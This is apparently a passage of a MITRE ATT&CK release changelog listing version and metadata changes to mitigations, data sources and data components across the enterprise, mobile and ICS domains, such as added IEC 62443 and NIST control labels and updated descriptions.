Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-19 16:50:45.681000+00:002023-03-31 17:27:28.395000+00:00
x_mitre_version1.11.2

[M1024] Restrict Registry Permissions

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-06-06 20:58:59.577000+00:002023-03-31 17:12:06.164000+00:00
x_mitre_version1.01.1

ics-attack

New Mitigations

[M0818] Validate Program Inputs

Current version: 1.0

Description: Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)

Minor Version Changes

[M0814] Static Network Configuration

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Configure hosts and devices to use static network configuratt1Configure hosts and devices to use static network configurat
>ions when possible, protocols that require dynamic discovery>ions when possible, protocols that require dynamic discovery
>/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate>/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate
> network message forwarding and enable various MitM attacks.> network message forwarding and enable various AiTM attacks.
> This mitigation may not always be usable due to limited dev> This mitigation may not always be usable due to limited dev
>ice features or challenges introduced with different network>ice features or challenges introduced with different network
> configurations.> configurations.
Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-04-05 14:21:27.977000+00:00
descriptionConfigure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various MitM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
Patches

[M0801] Access Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.081000+00:00

[M0936] Account Use Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.11', 'IEC 62443-4-2:2019 - CR 1.11', 'NIST SP 800-53 Rev. 4 - IA-5']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.383000+00:00

[M0949] Antivirus/Antimalware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:21.180000+00:00

[M0913] Application Developer Guidance

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AT-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:16.730000+00:00

[M0948] Application Isolation and Sandboxing

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 5.4', 'IEC 62443-4-2:2019 - CR 5.4', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:21.006000+00:00

[M0947] Audit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:20.836000+00:00

[M0800] Authorization Enforcement

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:13.851000+00:00

[M0946] Boot Integrity

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-4-2:2019 - CR 3.14', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:20.632000+00:00

[M0945] Code Signing

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:20.464000+00:00

[M0802] Communication Authenticity

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.1', 'IEC 62443-4-2:2019 - CR 3.1', 'NIST SP 800-53 Rev. 4 - SC-8; SC-23']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.263000+00:00

[M0953] Data Backup

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.3', 'IEC 62443-4-2:2019 - CR 7.3', 'NIST SP 800-53 Rev. 4 - CP-9']
values_changed
STIX FieldOld valueNew Value
modified2022-05-06 17:47:24.040000+00:002023-03-30 20:55:21.679000+00:00

[M0803] Data Loss Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.442000+00:00

[M0942] Disable or Remove Feature or Program

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:20.110000+00:00

[M0808] Encrypt Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1', 'NIST SP 800-53 Rev. 4 - SC-8']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:15.230000+00:00

[M0941] Encrypt Sensitive Information

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1', 'NIST SP 800-53 Rev. 4 - SC-28']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.946000+00:00

[M0938] Execution Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.774000+00:00

[M0950] Exploit Protection

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-16']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:21.352000+00:00

[M0937] Filter Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3; SC-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.604000+00:00

[M0804] Human User Authentication

Current version: 1.0


Old Description
New Description
t1Require user authentication before allowing access to data ot1Require user authentication before allowing access to data o
>r accepting commands to a device. While strong multi-factor >r accepting commands to a device. While strong multi-factor 
>authentication is preferable, it is not always feasible with>authentication is preferable, it is not always feasible with
>in ICS environments. Performing strong user authentication a>in ICS environments. Performing strong user authentication a
>lso requires additional security controls and processes whic>lso requires additional security controls and processes whic
>h are often the target of related adversarial techniques (e.>h are often the target of related adversarial techniques (e.
>g., Valid Accounts, Default Credentials). Therefore, associa>g., Valid Accounts, Default Credentials). Therefore, associa
>ted ATT&CK mitigations should be considered in addition to t>ted ATT&CK mitigations should be considered in addition to t
>his, including [Multi-factor Authentication](https://attack.>his, including [Multi-factor Authentication](https://attack.
>mitre.org/mitigations/M0932), [Account Use Policies](https:/>mitre.org/mitigations/M0932), [Account Use Policies](https:/
>/attack.mitre.org/mitigations/M0936), [Password Policies](ht>/attack.mitre.org/mitigations/M0936), [Password Policies](ht
>tps://attack.mitre.org/mitigations/M0927), [User Account Man>tps://attack.mitre.org/mitigations/M0927), [User Account Man
>agement](https://attack.mitre.org/mitigations/M0918), [Privi>agement](https://attack.mitre.org/mitigations/M0918), [Privi
>leged Account Management](https://attack.mitre.org/mitigatio>leged Account Management](https://attack.mitre.org/mitigatio
>ns/M0926), and [https://attack.mitre.org/mitigations/M1052>ns/M0926), and [User Account Control](https://attack.mitre.o
>User Account Control].>rg/mitigations/M1052).
Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.1', 'IEC 62443-4-2:2019 - CR 1.1', 'NIST SP 800-53 Rev. 4 - IA-2']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.615000+00:00
descriptionRequire user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [https://attack.mitre.org/mitigations/M1052/ User Account Control].Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).
x_mitre_attack_spec_version2.1.03.1.0

[M0935] Limit Access to Resource Over Network

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3; SC-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.179000+00:00

[M0934] Limit Hardware Installation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - EDR 3.2', 'NIST SP 800-53 Rev. 4 - MP-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:19.007000+00:00

[M0806] Minimize Wireless Signal Propagation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.6', 'IEC 62443-4-2:2019 - CR 1.6', 'NIST SP 800-53 Rev. 4 - SC-40']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.800000+00:00

[M0932] Multi-factor Authentication

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.7', 'IEC 62443-4-2:2019 - CR 1.7', 'NIST SP 800-53 Rev. 4 - IA-2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:18.842000+00:00

[M0807] Network Allowlists

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:14.969000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[M0931] Network Intrusion Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 6.2', 'IEC 62443-4-2:2019 - CR 6.2', 'NIST SP 800-53 Rev. 4 - SI-4']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:18.665000+00:00

[M0930] Network Segmentation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:18.480000+00:00

[M0928] Operating System Configuration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:18.276000+00:00

[M0809] Operational Information Confidentiality

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:15.415000+00:00

[M0810] Out-of-Band Communications Channel

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-37']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:15.598000+00:00

[M0927] Password Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.5', 'IEC 62443-4-2:2019 - CR 1.5', 'NIST SP 800-53 Rev. 4 - IA-5']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:18.097000+00:00

[M0926] Privileged Account Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3', 'NIST SP 800-53 Rev. 4 - AC-2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.929000+00:00

[M0811] Redundancy of Service

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CP-9']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:15.773000+00:00

[M0922] Restrict File and Directory Permissions

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-6']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.592000+00:00

[M0944] Restrict Library Loading

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-04-11 20:51:32.610000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[M0924] Restrict Registry Permissions

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-6']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.759000+00:00

[M0921] Restrict Web-Based Content

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 2.4', 'IEC 62443-4-2:2019 - HDR 2.4', 'NIST SP 800-53 Rev. 4 - SC-18']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.426000+00:00

[M0954] Software Configuration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:21.915000+00:00

[M0813] Software Process and Device Authentication

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.2', 'IEC 62443-4-2:2019 - CR 1.2', 'NIST SP 800-53 Rev. 4 - IA-9']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:15.949000+00:00

[M0817] Supply Chain Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SA-12']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:16.556000+00:00

[M0951] Update Software

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-4-2:2019 - CR 3.10', 'NIST SP 800-53 Rev. 4 - SI-2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:21.512000+00:00

[M0918] User Account Management

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3', 'NIST SP 800-53 Rev. 4 - AC-2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.252000+00:00

[M0917] User Training

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AT-2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:17.076000+00:00

[M0916] Vulnerability Scanning

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - RA-5']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:16.897000+00:00

[M0815] Watchdog Timers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
labels['IEC 62443-4-2:2019 - CR 7.2']
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-30 20:55:16.383000+00:00

Data Sources

enterprise-attack

Patches

[DS0017] Command

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:55:31.986Z2023-04-20T18:38:00.625Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0017https://attack.mitre.org/datasources/DS0017
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0022] File

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21T14:50:59.123Z2022-12-07T19:35:34.863Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0022https://attack.mitre.org/datasources/DS0022
x_mitre_attack_spec_version2.1.03.1.0

[DS0028] Logon Session

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:56:16.481Z2022-12-07T19:45:09.019Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0028https://attack.mitre.org/datasources/DS0028
x_mitre_attack_spec_version2.1.03.1.0

[DS0004] Malware Repository

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20T20:20:36.693Z2022-12-07T19:49:46.256Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0004https://attack.mitre.org/datasources/DS0004
x_mitre_attack_spec_version2.1.03.1.0

[DS0029] Network Traffic

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20T20:18:34.334Z2023-04-20T18:38:13.356Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0029https://attack.mitre.org/datasources/DS0029
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0009] Process

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:58:32.516Z2023-04-20T18:38:26.515Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0009https://attack.mitre.org/datasources/DS0009
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0012] Script

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:58:58.335Z2022-12-07T19:50:56.964Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0012https://attack.mitre.org/datasources/DS0012
x_mitre_attack_spec_version2.1.03.1.0

[DS0013] Sensor Health

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20T20:22:52.060Z2023-04-20T18:38:40.409Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0013https://attack.mitre.org/datasources/DS0013
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0002] User Account

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:59:59.646Z2022-12-07T19:50:43.993Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0002https://attack.mitre.org/datasources/DS0002
x_mitre_attack_spec_version2.1.03.1.0

mobile-attack

New Data Sources

[DS0041] Application Vetting

Current version: 1.0

Description: Application vetting report generated by an external cloud service.


[DS0017] Command

Current version: 1.1

Description: A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)


[DS0029] Network Traffic

Current version: 1.1

Description: Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)


[DS0009] Process

Current version: 1.1

Description: Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)


[DS0013] Sensor Health

Current version: 1.1

Description: Information from host telemetry providing insights about system status, errors, or other notable functional activity


[DS0042] User Interface

Current version: 1.0

Description: Visual activity on the device that could alert the user to potentially malicious behavior.

ics-attack

Patches

[DS0039] Asset

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26T14:44:35.610Z2023-03-24T19:14:15.637Z
x_mitre_collection_layers[0]hostHost
external_references[0]['url']https://attack.mitre.org/data-sources/DS0039https://attack.mitre.org/datasources/DS0039
x_mitre_attack_spec_version2.1.03.1.0

[DS0017] Command

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:55:31.986Z2023-04-20T18:38:00.625Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0017https://attack.mitre.org/datasources/DS0017
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0022] File

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21T14:50:59.123Z2022-12-07T19:35:34.863Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0022https://attack.mitre.org/datasources/DS0022
x_mitre_attack_spec_version2.1.03.1.0

[DS0028] Logon Session

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:56:16.481Z2022-12-07T19:45:09.019Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0028https://attack.mitre.org/datasources/DS0028
x_mitre_attack_spec_version2.1.03.1.0

[DS0029] Network Traffic

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20T20:18:34.334Z2023-04-20T18:38:13.356Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0029https://attack.mitre.org/datasources/DS0029
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0040] Operational Databases

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-05-11T16:22:58.802Z2023-03-24T19:14:55.615Z
x_mitre_collection_layers[0]hostHost
x_mitre_attack_spec_version2.1.03.1.0

[DS0009] Process

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:58:32.516Z2023-04-20T18:38:26.515Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0009https://attack.mitre.org/datasources/DS0009
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsAndroid
x_mitre_platformsiOS
x_mitre_domainsmobile-attack

[DS0012] Script

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:58:58.335Z2022-12-07T19:50:56.964Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0012https://attack.mitre.org/datasources/DS0012
x_mitre_attack_spec_version2.1.03.1.0

[DS0002] User Account

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21T15:59:59.646Z2022-12-07T19:50:43.993Z
external_references[0]['url']https://attack.mitre.org/data-sources/DS0002https://attack.mitre.org/datasources/DS0002
x_mitre_attack_spec_version2.1.03.1.0

Data Components

enterprise-attack

Patches

Process: OS API Execution

Current version: 1.0


Old Description
New Description
t1Initial construction of a WMI object, such as a filter, const1Operating system function/method calls executed by a process
>umer, subscription, binding, or provider (ex: Sysmon EIDs 19 
>-21) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-30T14:26:51.806Z2023-04-21T15:41:36.287Z
descriptionInitial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)Operating system function/method calls executed by a process
x_mitre_attack_spec_version2.1.03.1.0

mobile-attack

New Data Components

Application Vetting: API Calls

Current version: 1.0

Description: API calls utilized by an application that could indicate malicious activity


Command: Command Execution

Current version: 1.1

Description: The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )


Sensor Health: Host Status

Current version: 1.1

Description: Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)


Application Vetting: Network Communication

Current version: 1.0

Description: Network requests made by an application or domains contacted


Network Traffic: Network Connection Creation

Current version: 1.1

Description: Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)


Network Traffic: Network Traffic Content

Current version: 1.0

Description: Logged network traffic data showing both protocol header and body values (ex: PCAP)


Network Traffic: Network Traffic Flow

Current version: 1.0

Description: Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)


User Interface: Permissions Request

Current version: 1.0

Description: System prompts triggered when an application requests new or additional permissions


Application Vetting: Permissions Requests

Current version: 1.0

Description: Permissions declared in an application's manifest or property list file


Process: Process Creation

Current version: 1.1

